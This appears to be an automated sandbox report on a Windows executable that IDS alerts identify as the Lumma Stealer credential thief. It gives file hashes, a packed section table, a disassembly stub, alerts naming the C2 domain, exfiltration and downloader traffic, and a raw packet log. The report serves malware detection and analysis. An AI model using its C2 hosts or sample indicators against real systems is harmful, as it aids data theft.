                                                                                                                                                                                                            Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.94693373724988
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                            File size:1'849'856 bytes
                                                                                                                                                                                                            MD5:44c888b5629af6e043519152b1221c53
                                                                                                                                                                                                            SHA1:2013902d11aa2b60de811e8304c385be0c5637a2
                                                                                                                                                                                                            SHA256:f6042fe19549edb51ec4e6857327e9cfdda4c66eb89d606259f04ee2dda5f1f0
                                                                                                                                                                                                            SHA512:332320f5b28a190f11d9240ec05281bb2253955114f91156de2af9ae4007e5eb27ae98e946e4c465fede3a73cd6d088bc345cdf4c12f82686e620fbbee77f73b
                                                                                                                                                                                                            SSDEEP:49152:3qkVD6LCE2MCmc85J8FTMbtRrzhn94Qo8ev9n:33B6Lh2NrGbtNh+pFl
                                                                                                                                                                                                            TLSH:298533B82CF1DDB0C21BA278836788493CFBAD72165AC71F6C67066868DF255F205DE1
                                                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$?g.............................`I...........@...........................I.....(.....@.................................\...p..
                                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                                            Entrypoint:0x896000
                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x673F2404 [Thu Nov 21 12:13:56 2024 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            jmp 00007F3B604E666Ah
                                                                                                                                                                                                            prefetchT2 byte ptr [eax+eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            jmp 00007F3B604E8665h
                                                                                                                                                                                                            add byte ptr [ebx], cl
                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add al, 00h
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add dword ptr [edx], ecx
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add ecx, dword ptr [edx]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            xor byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add dword ptr [eax], eax
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            push es
                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            0x10000x560000x26600d4efe329b71c3275797a745d9d1462abFalse0.9986194523615635data7.975956934905569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x570000x2b00x200c9378606f677efef435876af9cf91c39False0.794921875data6.00252883312538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            0x590000x2a20000x200d84399750e3e6ad4b21a02c4efbfcd1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            lupaymij0x2fb0000x19a0000x1998008ad1a2c9ac818cfeaac2f708beb0dad9False0.994489993513431data7.953593367647339IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            pxtqjdhl0x4950000x10000x400ea19c67b00d07556429af52eb0ce65d0False0.7744140625data6.040288002622302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .taggant0x4960000x30000x22005b6bb98ecf0cb10a1a4e0107da8b13fdFalse0.05824908088235294DOS executable (COM)0.6384867801698222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_MANIFEST0x4943b80x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-21T15:17:08.855337+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.6628321.1.1.153UDP
                                                                                                                                                                                                            2024-11-21T15:17:10.445134+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649714188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:10.445134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:11.160408+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649714188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:11.160408+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649714188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:12.880771+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649715188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:12.880771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:13.583914+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649715188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:13.583914+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649715188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:15.650543+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:15.650543+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:16.533551+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:17.976483+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649732188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:17.976483+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649732188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:20.667175+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649739188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:20.667175+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:23.401337+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649748188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:23.401337+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649748188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:26.252395+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649761188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:26.252395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649761188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:31.392255+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649772188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:31.392255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649772188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:32.115959+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649772188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-21T15:17:33.986026+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649778185.215.113.1680TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.905672073 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.905782938 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.905833960 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.914098024 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.914205074 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.914257050 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.922518969 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.922647953 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.922709942 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.933120012 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.960369110 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.960637093 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.960903883 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.960987091 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.961121082 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.961354017 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:00.961404085 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.050273895 CET4434970740.113.103.199192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.051654100 CET49707443192.168.2.640.113.103.199
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.080209017 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.080244064 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.107897997 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.107928991 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.107954025 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.171224117 CET4434970740.113.103.199192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.450678110 CET4434970740.113.103.199192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.499530077 CET49707443192.168.2.640.113.103.199
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.573554039 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.573633909 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.573724985 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.577666998 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.577828884 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.577900887 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.586158037 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.586246967 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.586318016 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.594655037 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.594837904 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.594912052 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.603275061 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.603351116 CET4434970620.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.603413105 CET49706443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.921458006 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:01.937068939 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.249605894 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.801644087 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.801764011 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.837968111 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.838022947 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.839150906 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.855957031 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.856065989 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:02.856231928 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.508970022 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509001017 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509066105 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509119987 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509143114 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509156942 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509195089 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509807110 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509844065 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509872913 CET49708443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.509888887 CET4434970820.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.834253073 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.834352016 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.834448099 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.834896088 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.834989071 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.835066080 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.840050936 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.840079069 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.840254068 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:03.840293884 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.636251926 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.636344910 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.664633989 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.664750099 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667026043 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667073965 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667077065 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667131901 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667362928 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667442083 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667486906 CET4434971020.223.35.26192.168.2.6
